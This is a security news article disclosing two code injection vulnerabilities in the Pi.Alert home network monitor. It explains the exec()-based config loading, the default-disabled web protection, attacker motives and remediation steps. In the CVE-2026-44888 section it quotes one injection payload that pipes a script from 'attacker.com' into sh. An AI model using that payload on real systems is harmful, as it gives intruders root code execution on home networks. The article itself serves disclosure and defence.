Two Unauthenticated RCEs in Pi.Alert: CVE-2026-44887 / 44888 Hit Home Network Watchers

Two critical unauthenticated remote code execution flaws have been disclosed in Pi.Alert, the open-source tool used in homes and SOHO environments to watch which devices are connected to the local Wi-Fi. CVE-2026-44887 and CVE-2026-44888 both carry a CVSS score of 9.8. NVD formally published them on May 27, 2026, and they are fixed in the 2026-05-07 release.

Pi.Alert is designed to detect unknown devices joining your Wi-Fi and is a popular homelab project on Raspberry Pi. What is meant to be a watchdog protecting the home network turns into the opposite here: two Python code injection flaws in its configuration interface let an attacker plant arbitrary code into pialert.conf, which the scan daemon then loads through something close to exec(). The watchdog becomes a foothold for the intruder.

The biggest issue is that web protection is disabled by default. The configuration key PIALERT_WEB_PROTECTION = False is shipped as the default value, on the assumption that the tool is only ever reachable from inside the home network. The moment a user sets up port forwarding or exposes the interface for remote work, that RCE path becomes reachable from the outside.

What Pi.Alert Is

Pi.Alert is an OSS project maintained by Germany-based leiweibau and is itself a fork of Pi-Alert, originally written by another developer, pucherot. The design is simple: it runs on a Raspberry Pi (or any Linux box) via Docker or a direct install, periodically enumerates LAN devices with ARP scan and nmap, and when a new MAC address shows up it sends an alert through Pushover, email, or Telegram.

Typical use cases include the following.

• Home users watching for unknown MAC addresses beyond their kids' IoT devices on the home Wi-Fi
• SOHO owners logging unauthorized connections to the office wireless LAN
• Homelab enthusiasts running it continuously on a Raspberry Pi as one of the standard OSS picks
• Rental property managers keeping tabs on shared Wi-Fi usage
• Combining it with web service monitoring (health checks) to also do uptime monitoring of internal services

With more than 3,000 stars on GitHub and frequent mentions in r/selfhosted and the Home Assistant community, it is one of the go-to choices for home network monitoring. It is not a commercial product but an OSS run on an individual's own responsibility, and it is exactly that pattern of individual operation that makes it an attractive target for attackers here.

CVE-2026-44887: Python Injection Through The Web Config Editor (CVSS 9.8)

CVE-2026-44887 stems from the fact that the configuration editor built into Pi.Alert's web admin panel writes user input into pialert.conf without sanitization. NVD classifies it as CWE-94 (Improper Control of Generation of Code).

The Pi.Alert configuration file is written in a form that can be read as Python syntax, and the background scan daemon loads it at startup and on a regular interval (every 3 to 5 minutes) through something close to exec(open('pialert.conf').read()). If an attacker writes an arbitrary Python expression into that configuration file through the web admin panel, the daemon will automatically evaluate the expression on its next cycle.

The scan daemon usually runs as root, because it needs to perform ARP scans and other low-level network probing. The upshot is that an attacker who can post Python code through the web interface ends up able to execute it as root on that machine. The flaw was reported by aslein1413-sys, and the GHSA advisory records that the report was sent to the maintainer on May 8, 2026.

CVE-2026-44888: Missing Numeric Field Validation In SaveConfigFile() (CVSS 9.8)

CVE-2026-44888 is another code injection path into pialert.conf, but the entry point is different. The SaveConfigFile action in front/php/server/files.php writes user-supplied "numeric" fields straight into the configuration file without validating them, so an attacker can embed Python expressions inside values that are supposed to be numeric.

The two especially problematic keys are DB_PATH and LOG_PATH, which are written without quotes in the configuration file by design. Path strings should be string literals wrapped in quotes, but because they are written unquoted, an attacker can plant something like DB_PATH=__import__('os').system('curl attacker.com/sh|sh') and the scan daemon's Python interpreter will evaluate it as an expression and actually run the command on its next load. The GHSA advisory describes the structure of the PoC.

Both CVEs were reported by the same researcher, aslein1413-sys, and both trace back to a fundamental design choice in Pi.Alert's backend: reading the configuration file via exec(). The fix release (2026-05-07) bundles together proper quoting when writing the configuration file and turning web protection on by default.

Why Home And SOHO Watchers Attract Attackers

The motivation for targeting home network monitoring tools like Pi.Alert is easy to overlook but quite clear.

First, these tools usually run as root and sit in a position where they can see the entire home network. For an attacker that is an extremely valuable launchpad for reconnaissance and lateral movement across every device on the home network: PCs, phones, IoT devices, NAS boxes, and so on.

Second, because they are run by individuals, security patches tend not to land. People who run Pi.Alert often leave their home Raspberry Pi running for months or years without rebooting. Unlike commercial vendor products, the auto-update story is weak, and there is a long lag between CVE disclosure and patches actually being applied.

Third, more of these boxes are exposed for remote access than you would expect. Technically inclined homelab users frequently want to "check on the home network from outside" and end up exposing Pi.Alert's web UI through Cloudflare Tunnel, Tailscale, or even direct port forwarding. That is exactly the moment when the default "web protection disabled" becomes fatal.

Fourth, they are "just right as disposable" hosts for mining, botnets, and proxies. From an attacker's perspective, an always-on Linux box on a home network (often a Raspberry Pi) is an ideal "light and quiet" resource for crypto miners, proxy bots, or DDoS staging. Compromising a Pi.Alert host lets them quietly use the home's bandwidth and CPU for a long time.

What To Do Now

1. Update Pi.Alert to the latest version (2026-05-07 release or later). If you are running it under Docker, pull the latest image with docker pull jokobsk/pi.alert or docker pull leiweibau/pi.alert and restart the container. If you are running from a Git clone, git pull and then restart the scan daemon.

2. Set PIALERT_WEB_PROTECTION to True. Edit the configuration file /config/pialert.conf directly and change it to PIALERT_WEB_PROTECTION = True. This requires authentication to access the web UI. Even on the fixed release, set this explicitly to be safe.

3. Take the web UI off the public internet for now. If you have been exposing it via Cloudflare Tunnel, Ngrok, or similar, take it down temporarily until you have updated and verified the authentication settings. Switching to SSH or VPN-based access is worth considering as the new normal.

4. Check the Pi.Alert host for signs of compromise. Look in /tmp, /var/tmp, and user home directories for unfamiliar executables or cron entries. On Raspberry Pi hosts in particular, crypto miners (such as XMRig) and reverse shell scripts often get left behind. Also check ps aux for unfamiliar processes and netstat -tnp for unfamiliar outbound connections.

5. Rotate the logs and configuration Pi.Alert handles. If the compromise succeeded, every MAC address history and device scan record Pi.Alert collected may have leaked. Home network topology might seem low-sensitivity at a glance, but when combined with visitor device history, occupancy patterns, and IoT model fingerprinting, it is the kind of information that can feed a physical intrusion plan. Inventory the devices in the home and change the Wi-Fi password if necessary.

6. Even at home or SOHO scale, think about "protecting the watchdog." The pattern where the monitoring tool itself becomes the attack surface applies just as much to enterprise SIEM or EDR. We have covered the same pattern in Trivy compromised twice in a row and in the same-day coverage of Dalfox CVE-2026-45087. For home security gear too, regular updates and minimal external exposure are basic maintenance hygiene.

CISA KEV Status And Related Coverage

As of May 28, 2026, CVE-2026-44887 and CVE-2026-44888 are not listed in the CISA KEV catalog. Pi.Alert is a small OSS project run mostly in homes and by individuals, so it falls outside the primary scope of a KEV catalog aimed at U.S. federal agencies. But this is exactly the kind of software that botnet operators and crypto miner distributors love to abuse as a small, ideal target.

We continuously track the list of CVEs that CISA confirms as being actively exploited on our CISA KEV dashboard (Japanese). For CVE watch on home and SOHO OSS (Pi-hole, Home Assistant, Plex, Jellyfin, Nextcloud, and so on), our OSS supply chain scanner shows the latest status. Managing CVEs for self-hosted OSS like Pi.Alert with the same discipline you would apply to enterprise products is the key to keeping attackers from setting up long-term residency.

References

• ▸ NVD - CVE-2026-44887 (Python injection via web config editor)
• ▸ NVD - CVE-2026-44888 (SaveConfigFile numeric field injection)
• ▸ GHSA-r59g-5wf9-f7vv (CVE-2026-44887)
• ▸ GHSA-xg85-f8qw-7c5f (CVE-2026-44888)
• ▸ Pi.Alert official repository
• ▸ CISA - Known Exploited Vulnerabilities Catalog